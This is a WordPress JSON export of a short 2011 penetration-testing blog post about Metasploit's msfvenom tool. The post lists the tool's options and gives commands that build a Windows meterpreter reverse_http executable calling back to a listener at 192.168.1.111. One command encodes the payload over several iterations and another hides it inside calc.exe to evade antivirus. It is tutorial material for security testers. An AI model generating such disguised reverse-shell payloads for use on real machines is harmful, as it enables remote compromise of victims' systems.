{"id":168,"date":"2011-07-07T14:58:41","date_gmt":"2011-07-07T13:58:41","guid":{"rendered":"https:\/\/www.phillips321.co.uk\/?p=168"},"modified":"2011-07-12T12:54:32","modified_gmt":"2011-07-12T11:54:32","slug":"metasploits-msfvenon-command-line-utility","status":"publish","type":"post","link":"https:\/\/www.phillips321.co.uk\/2011\/07\/07\/metasploits-msfvenon-command-line-utility\/","title":{"rendered":"Metasploit’s msfvenon command line utility"},"content":{"rendered":"

So unfortunately I have not had the time lately to keep up to date with the changes going on with metasploit but one thing that caught my eye was the msfvenom binary in the root of the framework3 directory. Neat name, but what is it? A little googling found me this blog post by bannedit<\/a>. He goes on to mention that msfvenon simply combines the functionality of both msfpayload<\/b> and msfencode<\/b>.
\n[code lang=”bash”]Usage: .\/msfvenom [options]
\nOptions:
\n -p, –payload [payload] Payload to use. Specify a ‘-‘ or stdin to use custom payloads
\n -l, –list [module_type] List a module type example: payloads, encoders, nops, all
\n -n, –nopsled [length] Prepend a nopsled of [length] size on to the payload
\n -f, –format [format] Format to output results in: raw, ruby, rb, perl, pl, c, js_be, js_le, java, dll, exe, exe-small, elf, macho, vba, vbs, loop-vbs, asp, war
\n -e, –encoder [encoder] The encoder to use
\n -a, –arch [architecture] The architecture to use
\n –platform [platform] The platform of the payload
\n -s, –space [length] The maximum size of the resulting payload
\n -b, –bad-chars [list] The list of characters to avoid example: ‘\\x00\\xff’
\n -i, –iterations [count] The number of times to encode the payload
\n -c, –add-code [path] Specify an additional win32 shellcode file to include
\n -x, –template [path] Specify a custom executable file to use as a template
\n -k, –keep Preserve the template behavior and inject the payload as a new thread
\n -h, –help Show this message[\/code]
\nThe new and quick way to create a meterpreter payload would be this:<\/p>\n

1
<\/div><\/td>
.\/<\/span>msfvenom -p<\/span> windows\/<\/span>meterpreter\/<\/span>reverse_http -f<\/span> exe LHOST<\/span>=192.168.1.111 LPORT<\/span>=80<\/span> ><\/span> payload.exe<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

Moving on to include encoding with 5 iterations(shikata_ga_nai as default)<\/i>:<\/p>\n

1
<\/div><\/td>
.\/<\/span>msfvenom -p<\/span> windows\/<\/span>meterpreter\/<\/span>reverse_http -e<\/span> -i<\/span> 5<\/span> -f<\/span> exe LHOST<\/span>=192.168.1.111 LPORT<\/span>=80<\/span> ><\/span> payload.exe<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

And finally hiding inside a trusted executable:<\/p>\n

1
<\/div><\/td>
.\/<\/span>msfvenom -p<\/span> windows\/<\/span>meterpreter\/<\/span>reverse_http -e<\/span> -i<\/span> 5<\/span> -x<\/span> calc.exe -f<\/span> exe LHOST<\/span>=192.168.1.111 LPORT<\/span>=80<\/span> ><\/span> payload.exe<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n

For those that didn’t know, creation of a windows exe payload always uses data\/templates\/template_x86_windows.exe<\/b> in order to create the payload, this can be changed on the fly like we did above by using the -x calc.exe<\/b> flag. If you want to permanently change the exe then just simply swap out template_x86_windows.exe<\/b> for what ever you wish. If you don’t want to use this template method just use the old way to get a very small executable simply use the -f exe-small<\/b> flag, but beware; most AV products will catch this!<\/p>\n","protected":false},"excerpt":{"rendered":"

So unfortunately I have not had the time lately to keep up to date with the changes going on with metasploit but one thing that caught my eye was the msfvenom binary in the root of the framework3 directory. Neat name, but what is it? A little googling found me this blog post by bannedit. […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[64],"tags":[80,456,76,77,78,79],"_links":{"self":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/168"}],"collection":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/comments?post=168"}],"version-history":[{"count":11,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/168\/revisions"}],"predecessor-version":[{"id":184,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/168\/revisions\/184"}],"wp:attachment":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/media?parent=168"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/categories?post=168"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/tags?post=168"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}